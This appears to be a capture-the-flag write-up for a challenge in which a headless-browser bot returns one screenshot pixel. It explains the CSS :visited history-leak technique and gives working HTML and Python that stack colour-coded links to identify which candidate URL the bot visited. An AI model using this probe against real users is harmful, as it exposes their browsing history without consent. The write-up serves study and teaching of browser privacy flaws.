The core of the challenge is as follows (excerpts of the challenge source; `app`, `driver` and `url` are defined in parts the writeup omits):

```python
import secrets
import sys
from flask import Flask, make_response
from PIL import Image

# Read the real flag and generate a list of 1000 random candidate flags
flag = open('flag.txt').read().strip()
flags = [secrets.token_hex(16) for _ in range(1000)]
flag_access = secrets.choice(flags)  # randomly pick one candidate as the access credential
gamble_chance = 3  # number of guessing attempts allowed

@app.after_request
def add_header(response):
    # Set Referrer-Policy to no-referrer to prevent CSRF
    response.headers['Referrer-Policy'] = 'no-referrer'
    return response

@app.route('/')
def list_flags():
    # List a link to every candidate flag
    response = ''
    for i in flags:
        response += f'<a href="/{i}">{i}</a><br>'
    return make_response(response, 200)

# Excerpt from the bot route: the headless browser first visits the index and the
# chosen flag URL (marking it as visited), then opens the attacker-supplied url
driver.get('http://127.0.0.1:7382/')
driver.implicitly_wait(3)
driver.get('http://127.0.0.1:7382/' + flag_access)
driver.implicitly_wait(3)
driver.switch_to.new_window('tab')
driver.switch_to.window(driver.window_handles[0])
print('[-] Visiting URL', url, file=sys.stderr)
driver.get(url)
# Only the top-left pixel of the screenshot is returned. Note that tobytes() yields the
# raw pixel bytes (RGB or RGBA), not a PNG file, despite the Content-Type header.
image = Image.open('screenshot.png')
screenshot_data = image.crop((0, 0, 1, 1)).tobytes()
response = make_response(screenshot_data, 200)
response.headers['Content-Type'] = 'image/png'
return response
```
The CSS history leak (also known as History Leaking or Visit Status Leaking) is a privacy vulnerability that exploits browser behaviour to probe a user's browsing history. Its core principle is to abuse the browser's ability to apply different styles to visited links (`:visited`) and unvisited links (`:link`), combined with JavaScript or other techniques, to infer which sites the user has visited.
```html
<style>
a:link { color: blue; }
a:visited { color: red; }
</style>
<a href="https://baidu.com.fake">Example link</a>
```
In this challenge, we can use a special character (the full block █) together with `mix-blend-mode`, so that the visited colour shows up in the rendered pixels:
```html
<style>
a {
    position: absolute;
    color: white;
    mix-blend-mode: multiply;
}
a:visited {
    color: red;
}
</style>
<a href="https://baidu.com.fake">█<-A5rZ Write that</a>
```
Stack several styled links on top of each other so that they display as different colours:
```html
<!DOCTYPE html>
<html>
<head>
<style>
.container {
    position: relative;
    width: 50px;
    height: 50px;
    background-color: white;
}
a {
    position: absolute;
    top: 0;
    left: 0;
    font-size: 40px;
    color: white;
    mix-blend-mode: multiply;
}
a:nth-child(1):visited { color: #FF0000; }
a:nth-child(2):visited { color: #00FF00; }
</style>
</head>
<body>
<div class="container">
    <a href="https://www.baidu.com.fake/?a=1">█</a>
    <a href="https://www.baidu.com.fake/?a=2">█</a>
</div>
</body>
</html>
```
From this we can derive the solution to the challenge: stack all n flag links at the same pixel and extract the subtle colour difference that identifies the one the bot visited.
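The generalisation to n candidates, as an added example that is not part of the original writeup or the challenge code: each link gets a `:visited` colour that encodes its index in 4 bits per channel, so a single returned pixel identifies the visited candidate within the limited number of attempts, and white (the identity under `multiply`) means nothing was visited. It assumes, as the writeup's own example does, that the 40px block glyph covers the sampled top-left pixel; the candidate URLs below are constructed sample values.

```python
import html

STEP = 16  # 4 bits per channel: 4096 colours, and +/-8 per channel of rounding tolerance

def index_to_color(i):
    """Map candidate index i (0..4094) to an RGB triple. White (index 4095) is reserved:
    an all-white pixel means none of the stacked links was visited."""
    if not 0 <= i < 0xFFF:
        raise ValueError("index out of range")
    return ((i & 0xF) * STEP, ((i >> 4) & 0xF) * STEP, ((i >> 8) & 0xF) * STEP)

def color_to_index(pixel):
    """Invert index_to_color. `pixel` is any sequence whose first three values are R, G, B,
    e.g. the raw bytes the bot returns from Image.crop((0, 0, 1, 1)).tobytes()."""
    r, g, b = (min(15, round(c / STEP)) for c in pixel[:3])
    i = r | (g << 4) | (b << 8)
    return None if i == 0xFFF else i

def build_probe_page(urls):
    """HTML that stacks one full-block glyph per candidate URL at (0, 0) over a white box.
    Unvisited links stay white, which is the identity under mix-blend-mode: multiply, so the
    rendered top-left pixel equals the :visited colour of the single visited link.
    Assumption: the 40px glyph covers the sampled pixel, as in the writeup's own example."""
    rules = "\n".join(
        "a:nth-child(%d):visited{color:rgb(%d,%d,%d)}" % ((n + 1,) + index_to_color(n))
        for n in range(len(urls)))
    links = "\n".join('<a href="%s">\u2588</a>' % html.escape(u, quote=True) for u in urls)
    return ("<!DOCTYPE html><html><head><meta charset=\"utf-8\"><style>\n"
            ".container{position:relative;width:50px;height:50px;background:#fff}\n"
            "a{position:absolute;top:0;left:0;font-size:40px;color:#fff;mix-blend-mode:multiply}\n"
            + rules + "\n</style></head><body><div class=\"container\">\n"
            + links + "\n</div></body></html>\n")

if __name__ == "__main__":
    # Constructed sample: three candidate paths; pretend the bot visited the second one
    candidates = ["http://127.0.0.1:7382/%032x" % k for k in (1, 2, 3)]
    print(build_probe_page(candidates))
    print(color_to_index(bytes(index_to_color(1))))  # -> 1
```

In the challenge, the page returned by `build_probe_page(flags)` is what the bot is sent to, and the pixel bytes it hands back are fed to `color_to_index` to recover `flag_access`.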